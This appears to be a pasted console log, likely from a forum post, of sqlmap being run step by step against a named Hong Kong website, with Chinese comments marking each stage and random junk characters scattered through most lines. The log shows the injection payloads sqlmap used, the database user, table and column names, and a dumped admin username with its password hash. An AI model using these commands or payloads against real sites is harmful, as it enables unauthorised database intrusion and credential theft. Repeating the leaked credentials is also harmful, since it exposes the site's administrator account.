D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 h* U( }3 S' c% v# W/ lms "Mysql" --current-user /* 注解:获取当前用户名称
* _" v, f4 @, L1 _: p sqlmap/0.9 - automatic SQL injection and database takeover tool% c7 c- W8 Q' Y4 F
http://sqlmap.sourceforge.net starting at: 16:53:54& G6 W0 Y3 l( ]3 s
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as c$ c, a, T+ G: _/ I# o1 m
session file
0 N) X! Y, S. d2 k[16:53:54] [INFO] resuming injection data from session file
$ L$ }# l1 M0 O4 p- u: f, g[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
3 v( ^6 V8 \1 [% e/ m% A0 ^[16:53:54] [INFO] testing connection to the target url
$ o4 ~- G t" Y% z+ F* @3 rsqlmap identified the following injection points with a total of 0 HTTP(s) reque
' v, N' t" w. p4 P4 i- {7 c* dsts:0 c9 f4 Y' _. | I" b( T
---
1 h5 H& ~4 L; y' H. G( H! vPlace: GET, ?; V( \5 D- s2 i1 d
Parameter: id
4 Z2 _' W7 n" l) ~% L: d# V1 [ Type: boolean-based blind7 _! k- y& ]! U. E" n+ h0 o
Title: AND boolean-based blind - WHERE or HAVING clause' Z) E( _! B* b4 C& |
Payload: id=276 AND 799=799
: ^8 E$ p |! ], m \ Type: error-based
* ] G/ A& ~- n7 x Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 Y2 g* D* ?3 ^$ _ Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: l% |% \8 R0 M9 E$ C- e2 ~
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ N& s% O0 |& T; n X
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
2 e. N% n2 O+ Q8 ?; D" d- e Type: UNION query
~. n" W* K& Q4 P Title: MySQL UNION query (NULL) - 1 to 10 columns
3 c, |: J5 B. E- b% A5 z Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
6 C" N. |6 T0 C4 M. x8 V! a/ G# o& _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),2 y( P! P( ]2 a
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# p4 t( J' c. U5 p7 O( R8 C& q
Type: AND/OR time-based blind
3 y: v/ z& V9 N/ B( L Title: MySQL > 5.0.11 AND time-based blind
' J- I1 i* h' v, F9 W Payload: id=276 AND SLEEP(5)
! _' \. L% w5 P0 w& i( h3 @$ x! p---+ E0 v3 B! r9 [4 C4 e6 [& a
[16:53:55] [INFO] the back-end DBMS is MySQL N q0 q# J5 H. U
web server operating system: Windows% A" L- h1 X6 s
web application technology: Apache 2.2.11, PHP 5.3.0& X; ]3 U* Q8 m8 D
back-end DBMS: MySQL 5.08 Q; p3 b T3 _: |! r. Y+ K
[16:53:55] [INFO] fetching current user
* ?7 H# X# E& K# ocurrent user: 'root@localhost' % M2 S1 C8 D' ?' X" M
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' |* w; v ^% r, I" x# c9 e4 L
tput\www.wepost.com.hk' shutting down at: 16:53:58
& F2 Z! @- M$ a7 e3 B
5 V( {3 I; N+ ^3 j( q. b' aD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# C1 }8 x! Q: ?4 O0 J7 e
ms "Mysql" --current-db /*当前数据库
8 [7 |, r& K9 R0 M: u sqlmap/0.9 - automatic SQL injection and database takeover tool
" A) j* p5 W# t$ r; n http://sqlmap.sourceforge.net starting at: 16:54:16
: |9 u1 ]9 E$ E1 S4 \- v% \[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as5 K0 v, O' U5 \7 W3 _5 E
session file( z+ J% ?/ V* ]6 h9 @+ s
[16:54:16] [INFO] resuming injection data from session file# W! Y# G5 {; N: [- v& F
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% j2 Q3 F+ e" d* i, f9 O6 w
[16:54:16] [INFO] testing connection to the target url: {& y0 m, z( M- o: J: i; Q
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
" J' R5 }5 }' rsts:
' W C& f9 C3 d# m4 ~--- ^2 P; ]. h7 u) ]5 {7 C
Place: GET
, \$ h$ H F7 {- AParameter: id
# X, U. w6 A' f6 r9 R! y Type: boolean-based blind5 I' @5 p% u1 `8 A
Title: AND boolean-based blind - WHERE or HAVING clause" A- n9 y, N+ I8 W: r* F
Payload: id=276 AND 799=799
" _4 q" `0 l" f& k Type: error-based
: Q+ @9 Z" m; _6 y$ {5 ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# M% T* N! _ c3 F/ M, n
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
4 ^7 t5 R+ o+ L' v) c4 n% T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 X9 n9 ~0 I& q- R$ M% z
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); U9 I! X' O N0 \
Type: UNION query7 I9 Y( B1 p$ f! J8 F
Title: MySQL UNION query (NULL) - 1 to 10 columns: j$ S" G; g3 z |# J5 J
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& {0 S( f1 s7 i. D, I) M
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
6 \ w9 Y& V( ?: h! tCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
2 U. b4 y. B" E' r8 n, c2 p$ I Type: AND/OR time-based blind
5 g9 a& X2 j( A4 p6 Y Title: MySQL > 5.0.11 AND time-based blind
# e% E( y! H$ Z! Y0 |; ~0 T" o N Payload: id=276 AND SLEEP(5)
8 U+ z( ^7 f+ e: }+ H& }---
8 {0 A: x; K" s. i5 I[16:54:17] [INFO] the back-end DBMS is MySQL
I$ G) u& r9 `' P9 C, V4 M$ kweb server operating system: Windows6 y" U. W# i0 g) K: E: g0 Z
web application technology: Apache 2.2.11, PHP 5.3.0) B: B: E1 h0 h& A' l
back-end DBMS: MySQL 5.0
6 M( b! e6 C/ q[16:54:17] [INFO] fetching current database0 l3 F& a5 _/ y. v
current database: 'wepost'" L* Z2 Y2 z! ~ S
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, n; p) L# f4 a& F* wtput\www.wepost.com.hk' shutting down at: 16:54:18" G! u3 d) f9 M+ R+ Q0 d' _
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 z! T" Z# ?( u
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名; d; {, M* J5 f$ [. t5 U
sqlmap/0.9 - automatic SQL injection and database takeover tool
M4 P) G C2 |. g4 R http://sqlmap.sourceforge.net starting at: 16:55:25
6 L* j2 Q# w# V5 G6 @[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as4 Y# k$ K% Z8 \5 S9 K
session file
, ]3 v6 m, ]( Q6 A* t[16:55:25] [INFO] resuming injection data from session file
7 C- U# d, C/ B6 d, Q( A( y2 K3 s[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
$ d$ r2 ?* G, m, o* _- f' N[16:55:25] [INFO] testing connection to the target url
; M1 w8 A9 f+ H+ N3 dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
, p6 ?& o$ R$ z0 G: U5 f( msts:9 Y( X) z. o, ]8 P6 V9 R0 o
---
/ f' ?- d# u9 F) }% u1 fPlace: GET
$ Y$ z9 I5 {/ x: |3 ?8 ?Parameter: id
' y) i' a+ N% C5 n1 v Type: boolean-based blind, a5 B8 m+ ^, s( e
Title: AND boolean-based blind - WHERE or HAVING clause
! @$ V8 X2 J, |0 r( z4 M1 d Payload: id=276 AND 799=799
4 ~1 M( i5 T+ d% y- i! t Type: error-based2 `6 k8 U6 X$ ?1 E
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# d% y+ [! O3 N6 O. O- I, ~! @
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" m& b6 {8 R. e* c% [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
0 F/ F1 C; L( T1 `: O) W, S/ R),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
8 d- p# G! ?7 O3 q3 g' w) t& E Type: UNION query3 {! `/ b/ U+ L% T6 c; P
Title: MySQL UNION query (NULL) - 1 to 10 columns8 `6 N, \1 f6 V
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. Y+ v7 W8 o4 S* s$ K- Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),4 W& R/ b3 p! D, w0 {+ @
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 C8 ]) @. L5 p3 i
Type: AND/OR time-based blind
4 @9 A2 c. |$ ~ Title: MySQL > 5.0.11 AND time-based blind2 q; [2 F% G; Y- G* n) }
Payload: id=276 AND SLEEP(5)
) z4 V- o* ^# V# @0 @---3 u( k+ l5 u/ v
[16:55:26] [INFO] the back-end DBMS is MySQL/ S% ^* b; y7 z' T% ]( I0 _' x- V& H
web server operating system: Windows
+ v, ~+ C: P$ G# p' q8 Jweb application technology: Apache 2.2.11, PHP 5.3.0. Q, q% d5 ]3 o) b U( v* e
back-end DBMS: MySQL 5.0
! ]1 B1 w# X1 e5 h[16:55:26] [INFO] fetching tables for database 'wepost'/ o& v, b; Q3 X7 d8 l# e6 y
[16:55:27] [INFO] the SQL query used returns 6 entries
- i# U8 t3 f# A2 E) B; X) DDatabase: wepost. U; E! B4 j; I& \) j6 n4 S. e# j
[6 tables]
. H# |/ f1 `" I+-------------+
' c' P& T! Q- }: ]* M| admin |
8 ^; D* P0 x5 N1 E7 f. @) N+ q4 s| article |* P+ j4 @9 n3 B9 z
| contributor |
3 M0 j6 |4 U' R1 I Y| idea |
, \7 w9 P$ h6 A: A| image |
* n5 }9 ?# J3 i0 G j| issue |
- z% L/ Y/ S8 @: v+-------------+& N: w; k' p- L: @+ d- \2 ~8 r7 A
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 D" W/ F1 Q4 l. X
tput\www.wepost.com.hk' shutting down at: 16:55:33
. _0 ^3 {% v) j. B+ s& ?" I$ L2 N) R+ A4 |
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db6 W0 f" d9 v0 L
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名7 m5 m) l. G% m1 }+ I* n5 s
sqlmap/0.9 - automatic SQL injection and database takeover tool6 Z$ [9 Z4 F0 c, v
http://sqlmap.sourceforge.net starting at: 16:56:06
+ c2 W6 N) N; Z) o$ }5 |4 D+ }sqlmap identified the following injection points with a total of 0 HTTP(s) reque: |5 T4 u5 C2 t: g' u# \! N- Y
sts:
1 n! X# P+ h" |) k---
2 a# u2 f) |- n0 s# \3 ?Place: GET' ` r1 F% ^9 E' ~
Parameter: id: K2 G' \" R1 o5 p
Type: boolean-based blind1 P I! j2 t9 ]1 W, J9 \0 L& f4 _# p( g
Title: AND boolean-based blind - WHERE or HAVING clause
7 q# q+ B6 a/ _3 I Payload: id=276 AND 799=7994 ^% J/ f% z. o0 Q: \" J o2 y8 w2 [
Type: error-based9 E. V+ C6 T7 c t4 j9 `3 v
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause; p. ~; y' X+ j8 z, G: Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
& j7 F' r& _6 p4 e" ]! f& w120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 j8 x: q$ y( ^+ g, t! F; m1 P5 ~),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); b# W5 b1 F, l2 |
Type: UNION query# |" T/ z# ]& i# A+ A# b
Title: MySQL UNION query (NULL) - 1 to 10 columns
7 x# n$ N: H! \ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* q, o5 Y$ L# n% m( U& y( Y% k( f
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
. c: f0 t- l! G1 Z- UCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ B. g4 a% Y2 p/ p V: Z
Type: AND/OR time-based blind
& r1 O+ r/ o( X Title: MySQL > 5.0.11 AND time-based blind
3 e4 V' |, }' l Payload: id=276 AND SLEEP(5)
: }& j, E& ^8 K! A5 Y/ [---! U3 o! [. y$ |8 N) Y+ b9 K/ z
web server operating system: Windows+ A5 E" H! k/ j W
web application technology: Apache 2.2.11, PHP 5.3.0( e$ s$ H2 e1 @* l2 t, w8 D
back-end DBMS: MySQL 5.0
% G4 O8 s- y" c[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se" F' L' x* X' O4 j' W3 t
ssion': wepost, wepost
/ n+ i! C; b9 J5 VDatabase: wepost' z0 w) r! H' g) ?8 a
Table: admin
7 j6 d; T' I: N: g[4 columns]
" q# D2 y( ]6 f6 V7 x7 l+ c( a6 R+----------+-------------+
/ W" |( J$ @0 G+ S| Column | Type |
+ p4 ~. V+ P* h, o6 q, d9 f+----------+-------------+
& Q: D) k. o% K% b/ S, r5 K| id | int(11) |
1 @2 O2 x6 E" ^" p' U6 m3 w5 c| password | varchar(32) |5 C- {. P! Z+ B
| type | varchar(10) |
) k, H9 K x# {9 p0 ^! n| userid | varchar(20) |6 x7 a8 P' _. _3 H
+----------+-------------+
. H( j+ |% J& J5 e6 c4 H% ~! v shutting down at: 16:56:19* r% `" h j* B9 k( Y$ y
, M- z$ M$ t. o6 T! f) u+ Q, [
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 d* L' v$ F9 M
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容: A3 s! h& d+ i6 L8 e" f* h
sqlmap/0.9 - automatic SQL injection and database takeover tool
3 X/ o3 g/ l1 y$ L7 Q5 _ http://sqlmap.sourceforge.net starting at: 16:57:14
; z- r T% h3 ^0 ^! V5 ^# qsqlmap identified the following injection points with a total of 0 HTTP(s) reque( Q" w2 U) H3 L
sts:! R+ \; K, I" m5 b. y# g4 k
---
1 _0 @2 i% f: @( iPlace: GET1 r) e0 S) }, Q9 ?5 m
Parameter: id
7 r! j/ d: ]) K r Type: boolean-based blind
0 s1 j. r& F n% P7 r) W3 N4 w) T Title: AND boolean-based blind - WHERE or HAVING clause- O& K! j# M7 U; ?0 m8 R
Payload: id=276 AND 799=799
( X* @0 R/ A. {( y& E) k) r; w Type: error-based
# l& K# T8 g; V Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 M8 Y. v5 u& _
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 g' F. c: l4 s( T$ R* v' L+ g( l
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
) Q8 ?; `. O9 `) i( s( M9 Y9 e$ d( a),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 v& v! N9 V" W* g& N l
Type: UNION query
4 P+ }3 S3 W$ H Title: MySQL UNION query (NULL) - 1 to 10 columns
$ U2 ~) H! `4 A! s; V* B1 ?" _, k0 ? Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 \( `% T+ r( v$ ](58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),& l# Y2 W) a+ w- V: W+ J6 V
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#, W e3 n* j \1 t, o
Type: AND/OR time-based blind
* Z" F, v+ o0 n* B! p Title: MySQL > 5.0.11 AND time-based blind9 f1 O' B, B4 Z: x2 Q1 F- s( i5 L9 V+ R
Payload: id=276 AND SLEEP(5)
i/ q7 k- U S' K \---5 I1 k: D* d+ E- p/ x! \
web server operating system: Windows
$ f# b4 q$ \$ k/ z( rweb application technology: Apache 2.2.11, PHP 5.3.0
0 y k# P6 W# gback-end DBMS: MySQL 5.0$ Z4 Q9 b% U. X4 B3 w$ g; b* m
recognized possible password hash values. do you want to use dictionary attack o+ y0 ~+ ~& C" ]! y
n retrieved table items? [Y/n/q] y' [: d5 N9 N) Z9 I0 G: [
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
" _, Y4 o; H5 P, G9 Rdo you want to use common password suffixes? (slow!) [y/N] y. ~2 b; a- ^1 l. M& o3 @
Database: wepost
2 c0 Q; O S8 n }% m' iTable: admin
8 h' z7 y& J2 u[1 entry]" |0 g8 s' t- Z
+----------------------------------+------------+
7 K* {7 L/ f$ [* U$ \; i4 J| password | userid |
4 D! k/ e6 ?0 p: [2 F* `+----------------------------------+------------+
5 `3 N& b& K+ X7 P0 a| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
/ [- v b( `* s. M6 u+----------------------------------+------------+
8 d+ s# D$ s5 w6 P) M3 } shutting down at: 16:58:14! F4 T9 C* Y6 K$ X+ W, r3 Z
: A2 e$ @% z9 h9 R/ `% I) @
D:\Python27\sqlmap> |